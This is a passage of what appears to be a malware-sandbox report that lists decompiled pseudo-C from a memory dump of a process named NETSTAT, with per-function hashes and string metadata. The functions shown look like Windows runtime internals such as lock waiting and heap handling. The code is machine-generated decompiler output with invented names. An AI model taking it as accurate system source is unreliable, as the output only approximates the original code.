                																			E033676E2(_t154);
                																			goto L41;
                																		}
                																	} else {
                																		E033676E2(_t154);
                																		_t177 = 0;
                																		goto L18;
                																	}
                																}
                															}
                														} else {
                															__eflags =  *_t176;
                															if( *_t176 != 0) {
                																goto L56;
                															} else {
                																__eflags =  *(_t176 + 2);
                																if( *(_t176 + 2) == 0) {
                																	goto L64;
                																} else {
                																	goto L56;
                																}
                															}
                														}
                													} else {
                														_t130 = 0xc000000d;
                														goto L32;
                													}
                												}
                												goto L35;
                											} else {
                												__eflags = _a8;
                												if(_a8 != 0) {
                													_t77 = 0xc000000d;
                												} else {
                													_v5 = 1;
                													L0338FCE3(_v20, _t170);
                													_t177 = 0;
                													__eflags = 0;
                													L15:
                													_t85 =  *[fs:0x18];
                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                														L18:
                														__eflags = _t130;
                														if(_t130 != 0) {
                															goto L32;
                														} else {
                															__eflags = _v5 - _t130;
                															if(_v5 == _t130) {
                																goto L32;
                															} else {
                																_t86 =  *[fs:0x18];
                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                																}
                																__eflags = _t177;
                																if(_t177 == 0) {
                																	L31:
                																	__eflags = 0;
                																	L033670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                																	goto L32;
                																} else {
                																	__eflags = _v24;
                																	_t91 =  *(_t177 + 0x20);
                																	if(_v24 != 0) {
                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                																		goto L31;
                																	} else {
                																		_t141 = _t91 & 0x00000040;
                																		__eflags = _t170 & 0x00000100;
                																		if((_t170 & 0x00000100) == 0) {
                																			__eflags = _t141;
                																			if(_t141 == 0) {
                																				L74:
                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                																				goto L27;
                																			} else {
                																				_t177 = E0338FD22(_t177);
                																				__eflags = _t177;
                																				if(_t177 == 0) {
                																					goto L42;
                																				} else {
                																					_t130 = E0338FD9B(_t177, 0, 4);
                																					__eflags = _t130;
                																					if(_t130 != 0) {
                																						goto L42;
                																					} else {
                																						_t68 = _t177 + 0x20;
                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                																						__eflags =  *_t68;
                																						_t91 =  *(_t177 + 0x20);
                																						goto L74;
                																					}
                																				}
                																			}
                																			goto L35;
                																		} else {
                																			__eflags = _t141;
                																			if(_t141 != 0) {
                																				_t177 = E0338FD22(_t177);
                																				__eflags = _t177;
                																				if(_t177 == 0) {
                																					L42:
                																					_t77 = 0xc0000001;
                																					goto L33;
                																				} else {
                																					_t130 = E0338FD9B(_t177, 0, 4);
                																					__eflags = _t130;
                																					if(_t130 != 0) {
                																						goto L42;
                																					} else {
                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                																						_t91 =  *(_t177 + 0x20);
                																						goto L26;
                																					}
                																				}
                																				goto L35;
                																			} else {
                																				L26:
                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                																				__eflags = _t94;
                																				L27:
                																				 *(_t177 + 0x20) = _t94;
                																				__eflags = _t170 & 0x00008000;
                																				if((_t170 & 0x00008000) != 0) {
                																					_t95 = _a12;
                																					__eflags = _t95;
                																					if(_t95 != 0) {
                																						_t96 =  *_t95;
                																						__eflags = _t96;
                																						if(_t96 != 0) {
                																							 *((short*)(_t177 + 0x22)) = 0;
                																							_t40 = _t177 + 0x20;
                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                																							__eflags =  *_t40;
                																						}
                																					}
                																				}
                																				goto L31;
                																			}
                																		}
                																	}
                																}
                															}
                														}
                													} else {
                														_t147 =  *( *[fs:0x18] + 0xfc0);
                														_t106 =  *(_t147 + 0x20);
                														__eflags = _t106 & 0x00000040;
                														if((_t106 & 0x00000040) != 0) {
                															_t147 = E0338FD22(_t147);
                															__eflags = _t147;
                															if(_t147 == 0) {
                																L41:
                																_t130 = 0xc0000001;
                																L32:
                																_t77 = _t130;
                																goto L33;
                															} else {
                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                																_t106 =  *(_t147 + 0x20);
                																goto L17;
                															}
                															goto L35;
                														} else {
                															L17:
                															_t108 = _t106 | 0x00000080;
                															__eflags = _t108;
                															 *(_t147 + 0x20) = _t108;
                															 *( *[fs:0x18] + 0xfc0) = _t147;
                															goto L18;
                														}
                													}
                												}
                											}
                											L33:
                										}
                									}
                								}
                							}
                						}
                						L35:
                						return _t77;
                					} else {
                						 *_t75 = 0x3447b80;
                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                						 *_t134 = _t75;
                						 *0x3447b84 = _t75;
                						_t73 = E0336EB70(_t134, 0x3447b60);
                						if( *0x3447b20 != 0) {
                							_t73 =  *( *[fs:0x30] + 0xc);
                							if( *((char*)(_t73 + 0x28)) == 0) {
                								_t73 = E0336FF60( *0x3447b20);
                							}
                						}
                						goto L5;
                					}
                				}
                			}

                Strings
                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 033CBE0F
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                • API String ID: 0-865735534
                • Opcode ID: be92b0d78f4e461bdfdd136fd5dad532d0ad349d395c6003a7e677eda7ed0238
                • Instruction ID: 32e21c1bdba4dac2cfc9faf1a2fa5a0dd80113a315004850da4a2a8081b4a0d5
                • Opcode Fuzzy Hash: be92b0d78f4e461bdfdd136fd5dad532d0ad349d395c6003a7e677eda7ed0238
                • Instruction Fuzzy Hash: 37A10075B10B468FDB25EF68D8D0B6AF7B8AF48724F08456DE902DB690DB30D941CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E03352D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                				signed char _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				signed int _v52;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t55;
                				signed int _t57;
                				signed int _t58;
                				char* _t62;
                				signed char* _t63;
                				signed char* _t64;
                				signed int _t67;
                				signed int _t72;
                				signed int _t77;
                				signed int _t78;
                				signed int _t88;
                				intOrPtr _t89;
                				signed char _t93;
                				signed int _t97;
                				signed int _t98;
                				signed int _t102;
                				signed int _t103;
                				intOrPtr _t104;
                				signed int _t105;
                				signed int _t106;
                				signed char _t109;
                				signed int _t111;
                				void* _t116;
                
                				_t102 = __edi;
                				_t97 = __edx;
                				_v12 = _v12 & 0x00000000;
                				_t55 =  *[fs:0x18];
                				_t109 = __ecx;
                				_v8 = __edx;
                				_t86 = 0;
                				_v32 = _t55;
                				_v24 = 0;
                				_push(__edi);
                				if(__ecx == 0x3445350) {
                					_t86 = 1;
                					_v24 = 1;
                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                				}
                				_t103 = _t102 | 0xffffffff;
                				if( *0x3447bc8 != 0) {
                					_push(0xc000004b);
                					_push(_t103);
                					E033997C0();
                				}
                				if( *0x34479c4 != 0) {
                					_t57 = 0;
                				} else {
                					_t57 = 0x34479c8;
                				}
                				_v16 = _t57;
                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                					_t93 = _t109;
                					L23();
                				}
                				_t58 =  *_t109;
                				if(_t58 == _t103) {
                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                					_t58 = _t103;
                					if(__eflags == 0) {
                						_t93 = _t109;
                						E03381624(_t86, __eflags);
                						_t58 =  *_t109;
                					}
                				}
                				_v20 = _v20 & 0x00000000;
                				if(_t58 != _t103) {
                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                				}
                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                				_t88 = _v16;
                				_v28 = _t104;
                				L9:
                				while(1) {
                					if(E03377D50() != 0) {
                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                					} else {
                						_t62 = 0x7ffe0382;
                					}
                					if( *_t62 != 0) {
                						_t63 =  *[fs:0x30];
                						__eflags = _t63[0x240] & 0x00000002;
                						if((_t63[0x240] & 0x00000002) != 0) {
                							_t93 = _t109;
                							E033EFE87(_t93);
                						}
                					}
                					if(_t104 != 0xffffffff) {
                						_push(_t88);
                						_push(0);
                						_push(_t104);
                						_t64 = E03399520();
                						goto L15;
                					} else {
                						while(1) {
                							_t97 =  &_v8;
                							_t64 = E0338E18B(_t109 + 4, _t97, 4, _t88, 0);
                							if(_t64 == 0x102) {
                								break;
                							}
                							_t93 =  *(_t109 + 4);
                							_v8 = _t93;
                							if((_t93 & 0x00000002) != 0) {
                								continue;
                							}
                							L15:
                							if(_t64 == 0x102) {
                								break;
                							}
                							_t89 = _v24;
                							if(_t64 < 0) {
                								L033ADF30(_t93, _t97, _t64);
                								_push(_t93);
                								_t98 = _t97 | 0xffffffff;
                								__eflags =  *0x3446901;
                								_push(_t109);
                								_v52 = _t98;
                								if( *0x3446901 != 0) {
                									_push(0);
                									_push(1);
                									_push(0);
                									_push(0x100003);
                									_push( &_v12);
                									_t72 = E03399980();
                									__eflags = _t72;
                									if(_t72 < 0) {
                										_v12 = _t98 | 0xffffffff;
                									}
                								}
                								asm("lock cmpxchg [ecx], edx");
                								_t111 = 0;
                								__eflags = 0;
                								if(0 != 0) {
                									__eflags = _v12 - 0xffffffff;
                									if(_v12 != 0xffffffff) {
                										_push(_v12);
                										E033995D0();
                									}
                								} else {
                									_t111 = _v12;
                								}
                								return _t111;
                							} else {
                								if(_t89 != 0) {
                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                									_t77 = E03377D50();
                									__eflags = _t77;
                									if(_t77 == 0) {
                										_t64 = 0x7ffe0384;
                									} else {
                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                									}
                									__eflags =  *_t64;
                									if( *_t64 != 0) {
                										_t64 =  *[fs:0x30];
                										__eflags = _t64[0x240] & 0x00000004;
                										if((_t64[0x240] & 0x00000004) != 0) {
                											_t78 = E03377D50();
                											__eflags = _t78;
                											if(_t78 == 0) {
                												_t64 = 0x7ffe0385;
                											} else {
                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                											}
                											__eflags =  *_t64 & 0x00000020;
                											if(( *_t64 & 0x00000020) != 0) {
                												_t64 = E033D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                											}
                										}
                									}
                								}
                								return _t64;
                							}
                						}
                						_t97 = _t88;
                						_t93 = _t109;
                						E033EFDDA(_t97, _v12);
                						_t105 =  *_t109;
                						_t67 = _v12 + 1;
                						_v12 = _t67;
                						__eflags = _t105 - 0xffffffff;
                						if(_t105 == 0xffffffff) {
                							_t106 = 0;
                							__eflags = 0;
                						} else {
                							_t106 =  *(_t105 + 0x14);
                						}
                						__eflags = _t67 - 2;
                						if(_t67 > 2) {
                							__eflags = _t109 - 0x3445350;
                							if(_t109 != 0x3445350) {
                								__eflags = _t106 - _v20;
                								if(__eflags == 0) {
                									_t93 = _t109;
                									E033EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                								}
                							}
                						}
                						_push("RTL: Re-Waiting\n");
                						_push(0);
                						_push(0x65);
                						_v20 = _t106;
                						E033E5720();
                						_t104 = _v28;
                						_t116 = _t116 + 0xc;
                						continue;
                					}
                				}
                			}





































                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Re-Waiting
                • API String ID: 0-316354757
                • Opcode ID: c12c3b29fa7cf946e197f477e7f67129a11d6294cebaf39bf8574fc36ea64b64
                • Instruction ID: af6fccd6f3eca9c394128f941905f258cc09f6149a1a9dcc7e6a7bc717e9d50b
                • Opcode Fuzzy Hash: c12c3b29fa7cf946e197f477e7f67129a11d6294cebaf39bf8574fc36ea64b64
                • Instruction Fuzzy Hash: 9461F331E00A449FDB21DF6CCCC0BBFB7E9EB49714F180AA9E8219B6D0D77499418B91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E03420EA5(void* __ecx, void* __edx) {
                				signed int _v20;
                				char _v24;
                				intOrPtr _v28;
                				unsigned int _v32;
                				signed int _v36;
                				intOrPtr _v40;
                				char _v44;
                				intOrPtr _v64;
                				void* __ebx;
                				void* __edi;
                				signed int _t58;
                				unsigned int _t60;
                				intOrPtr _t62;
                				char* _t67;
                				char* _t69;
                				void* _t80;
                				void* _t83;
                				intOrPtr _t93;
                				intOrPtr _t115;
                				char _t117;
                				void* _t120;
                
                				_t83 = __edx;
                				_t117 = 0;
                				_t120 = __ecx;
                				_v44 = 0;
                				if(E0341FF69(__ecx,  &_v44,  &_v32) < 0) {
                					L24:
                					_t109 = _v44;
                					if(_v44 != 0) {
                						E03421074(_t83, _t120, _t109, _t117, _t117);
                					}
                					L26:
                					return _t117;
                				}
                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                				_t5 = _t83 + 1; // 0x1
                				_v36 = _t5 << 0xc;
                				_v40 = _t93;
                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                				asm("sbb ebx, ebx");
                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                				if(_t58 != 0) {
                					_push(0);
                					_push(0x14);
                					_push( &_v24);
                					_push(3);
                					_push(_t93);
                					_push(0xffffffff);
                					_t80 = E03399730();
                					_t115 = _v64;
                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                						_push(_t93);
                						E0341A80D(_t115, 1, _v20, _t117);
                						_t83 = 4;
                					}
                				}
                				if(E0341A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                					goto L24;
                				}
                				_t60 = _v32;
                				_t97 = (_t60 != 0x100000) + 1;
                				_t83 = (_v44 -  *0x3448b04 >> 0x14) + (_v44 -  *0x3448b04 >> 0x14);
                				_v28 = (_t60 != 0x100000) + 1;
                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                				_v40 = _t62;
                				if(_t83 >= _t62) {
                					L10:
                					asm("lock xadd [eax], ecx");
                					asm("lock xadd [eax], ecx");
                					if(E03377D50() == 0) {
                						_t67 = 0x7ffe0380;
                					} else {
                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                					}
                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                						E0341138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                					}
                					if(E03377D50() == 0) {
                						_t69 = 0x7ffe0388;
                					} else {
                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                					}
                					if( *_t69 != 0) {
                						E0340FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                					}
                					if(( *0x3448724 & 0x00000008) != 0) {
                						E034152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                					}
                					_t117 = _v44;
                					goto L26;
                				}
                				while(E034215B5(0x3448ae4, _t83, _t97, _t97) >= 0) {
                					_t97 = _v28;
                					_t83 = _t83 + 2;
                					if(_t83 < _v40) {
                						continue;
                					}
                					goto L10;
                				}
                				goto L24;
                			}

























                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: d2524d80445e9434f093ef04bfc38c33fcdf15512922f99778b52c41acbdde8f
                • Instruction ID: a081b38f3a1ea22ed60a4eb04e44968e714d27c6f2e46e9ead425de9f94f4664
                • Opcode Fuzzy Hash: d2524d80445e9434f093ef04bfc38c33fcdf15512922f99778b52c41acbdde8f
                • Instruction Fuzzy Hash: 6C51C1712043819FD324DF29D980B1BBBE5EBC4344F44092EF596AF690D771E806C766
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0338F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char* _v20;
                				intOrPtr _v24;
                				char _v28;
                				intOrPtr _v32;
                				char _v36;
                				char _v44;
                				char _v52;
                				intOrPtr _v56;
                				char _v60;
                				intOrPtr _v72;
                				void* _t51;
                				void* _t58;
                				signed short _t82;
                				short _t84;
                				signed int _t91;
                				signed int _t100;
                				signed short* _t103;
                				void* _t108;
                				intOrPtr* _t109;
                
                				_t103 = __ecx;
                				_t82 = __edx;
                				_t51 = E03374120(0, __ecx, 0,  &_v52, 0, 0, 0);
                				if(_t51 >= 0) {
                					_push(0x21);
                					_push(3);
                					_v56 =  *0x7ffe02dc;
                					_v20 =  &_v52;
                					_push( &_v44);
                					_v28 = 0x18;
                					_push( &_v28);
                					_push(0x100020);
                					_v24 = 0;
                					_push( &_v60);
                					_v16 = 0x40;
                					_v12 = 0;
                					_v8 = 0;
                					_t58 = E03399830();
                					_t87 =  *[fs:0x30];
                					_t108 = _t58;
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                					if(_t108 < 0) {
                						L11:
                						_t51 = _t108;
                					} else {
                						_push(4);
                						_push(8);
                						_push( &_v36);
                						_push( &_v44);
                						_push(_v60);
                						_t108 = E03399990();
                						if(_t108 < 0) {
                							L10:
                							_push(_v60);
                							E033995D0();
                							goto L11;
                						} else {
                							_t109 = L03374620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                							if(_t109 == 0) {
                								_t108 = 0xc0000017;
                								goto L10;
                							} else {
                								_t21 = _t109 + 0x18; // 0x18
                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                								 *_t109 = 1;
                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                								 *(_t109 + 0xe) = _t82;
                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                								E0339F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                								 *((short*)(_t109 + 0xc)) =  *_t103;
                								_t91 =  *_t103 & 0x0000ffff;
                								_t100 = _t91 & 0xfffffffe;
                								_t84 = 0x5c;
                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                										_push(_v60);
                										E033995D0();
                										L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                										_t51 = 0xc0000106;
                									} else {
                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                										goto L5;
                									}
                								} else {
                									L5:
                									 *_a4 = _t109;
                									_t51 = 0;
                								}
                							}
                						}
                					}
                				}
                				return _t51;
                			}


























                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction ID: df4d4c564d78445cc8d37e1706d4a3256002de309ef8d5a0d6da01599cd291ce
                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction Fuzzy Hash: 12515A75504750AFD320DF29C881A6BBBF8FF48710F00892EF9959B690E7B4E914CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E033D3540(intOrPtr _a4) {
                				signed int _v12;
                				intOrPtr _v88;
                				intOrPtr _v92;
                				char _v96;
                				char _v352;
                				char _v1072;
                				intOrPtr _v1140;
                				intOrPtr _v1148;
                				char _v1152;
                				char _v1156;
                				char _v1160;
                				char _v1164;
                				char _v1168;
                				char* _v1172;
                				short _v1174;
                				char _v1176;
                				char _v1180;
                				char _v1192;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				short _t41;
                				short _t42;
                				intOrPtr _t80;
                				intOrPtr _t81;
                				signed int _t82;
                				void* _t83;
                
                				_v12 =  *0x344d360 ^ _t82;
                				_t41 = 0x14;
                				_v1176 = _t41;
                				_t42 = 0x16;
                				_v1174 = _t42;
                				_v1164 = 0x100;
                				_v1172 = L"BinaryHash";
                				_t81 = E03390BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                				if(_t81 < 0) {
                					L11:
                					_t75 = _t81;
                					E033D3706(0, _t81, _t79, _t80);
                					L12:
                					if(_a4 != 0xc000047f) {
                						E0339FA60( &_v1152, 0, 0x50);
                						_v1152 = 0x60c201e;
                						_v1148 = 1;
                						_v1140 = E033D3540;
                						E0339FA60( &_v1072, 0, 0x2cc);
                						_push( &_v1072);
                						E033ADDD0( &_v1072, _t75, _t79, _t80, _t81);
                						E033E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                						_push(_v1152);
                						_push(0xffffffff);
                						E033997C0();
                					}
                					return E0339B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                				}
                				_t79 =  &_v352;
                				_t81 = E033D3971(0, _a4,  &_v352,  &_v1156);
                				if(_t81 < 0) {
                					goto L11;
                				}
                				_t75 = _v1156;
                				_t79 =  &_v1160;
                				_t81 = E033D3884(_v1156,  &_v1160,  &_v1168);
                				if(_t81 >= 0) {
                					_t80 = _v1160;
                					E0339FA60( &_v96, 0, 0x50);
                					_t83 = _t83 + 0xc;
                					_push( &_v1180);
                					_push(0x50);
                					_push( &_v96);
                					_push(2);
                					_push( &_v1176);
                					_push(_v1156);
                					_t81 = E03399650();
                					if(_t81 >= 0) {
                						if(_v92 != 3 || _v88 == 0) {
                							_t81 = 0xc000090b;
                						}
                						if(_t81 >= 0) {
                							_t75 = _a4;
                							_t79 =  &_v352;
                							E033D3787(_a4,  &_v352, _t80);
                						}
                					}
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                				}
                				_push(_v1156);
                				E033995D0();
                				if(_t81 >= 0) {
                					goto L12;
                				} else {
                					goto L11;
                				}
                			}
































                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: BinaryHash
                • API String ID: 2994545307-2202222882
                • Opcode ID: e45da4c914cb84f10f75938eaa9181b705aa220f6a522d436a7114616ff0c8f7
                • Instruction ID: d55eae6d02988c2389f5656af119bf5320eb1396c48040c22d47c32153923361
                • Opcode Fuzzy Hash: e45da4c914cb84f10f75938eaa9181b705aa220f6a522d436a7114616ff0c8f7
                • Instruction Fuzzy Hash: B14124B6D0162C9BDF21DA50DCC0FEEB77CAB44724F0045E5AA09AB240DB709E88CF95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E034205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                				signed int _v20;
                				char _v24;
                				signed int _v28;
                				char _v32;
                				signed int _v36;
                				intOrPtr _v40;
                				void* __ebx;
                				void* _t35;
                				signed int _t42;
                				char* _t48;
                				signed int _t59;
                				signed char _t61;
                				signed int* _t79;
                				void* _t88;
                
                				_v28 = __edx;
                				_t79 = __ecx;
                				if(E034207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                					L13:
                					_t35 = 0;
                					L14:
                					return _t35;
                				}
                				_t61 = __ecx[1];
                				_t59 = __ecx[0xf];
                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                				_v36 = _a8 << 0xc;
                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                				asm("sbb esi, esi");
                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                				if(_t42 != 0) {
                					_push(0);
                					_push(0x14);
                					_push( &_v24);
                					_push(3);
                					_push(_t59);
                					_push(0xffffffff);
                					if(E03399730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                						_push(_t61);
                						E0341A80D(_t59, 1, _v20, 0);
                						_t88 = 4;
                					}
                				}
                				_t35 = E0341A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                				if(_t35 < 0) {
                					goto L14;
                				}
                				E03421293(_t79, _v40, E034207DF(_t79, _v28,  &_a4,  &_a8, 1));
                				if(E03377D50() == 0) {
                					_t48 = 0x7ffe0380;
                				} else {
                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                				}
                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                					E0341138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                				}
                				goto L13;
                			}

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E033D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                				char _v8;
                				intOrPtr _v12;
                				intOrPtr* _v16;
                				char* _v20;
                				short _v22;
                				char _v24;
                				intOrPtr _t38;
                				short _t40;
                				short _t41;
                				void* _t44;
                				intOrPtr _t47;
                				void* _t48;
                
                				_v16 = __edx;
                				_t40 = 0x14;
                				_v24 = _t40;
                				_t41 = 0x16;
                				_v22 = _t41;
                				_t38 = 0;
                				_v12 = __ecx;
                				_push( &_v8);
                				_push(0);
                				_push(0);
                				_push(2);
                				_t43 =  &_v24;
                				_v20 = L"BinaryName";
                				_push( &_v24);
                				_push(__ecx);
                				_t47 = 0;
                				_t48 = E03399650();
                				if(_t48 >= 0) {
                					_t48 = 0xc000090b;
                				}
                				if(_t48 != 0xc0000023) {
                					_t44 = 0;
                					L13:
                					if(_t48 < 0) {
                						L16:
                						if(_t47 != 0) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                						}
                						L18:
                						return _t48;
                					}
                					 *_v16 = _t38;
                					 *_a4 = _t47;
                					goto L18;
                				}
                				_t47 = L03374620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                				if(_t47 != 0) {
                					_push( &_v8);
                					_push(_v8);
                					_push(_t47);
                					_push(2);
                					_push( &_v24);
                					_push(_v12);
                					_t48 = E03399650();
                					if(_t48 < 0) {
                						_t44 = 0;
                						goto L16;
                					}
                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                						_t48 = 0xc000090b;
                					}
                					_t44 = 0;
                					if(_t48 < 0) {
                						goto L16;
                					} else {
                						_t17 = _t47 + 0xc; // 0xc
                						_t38 = _t17;
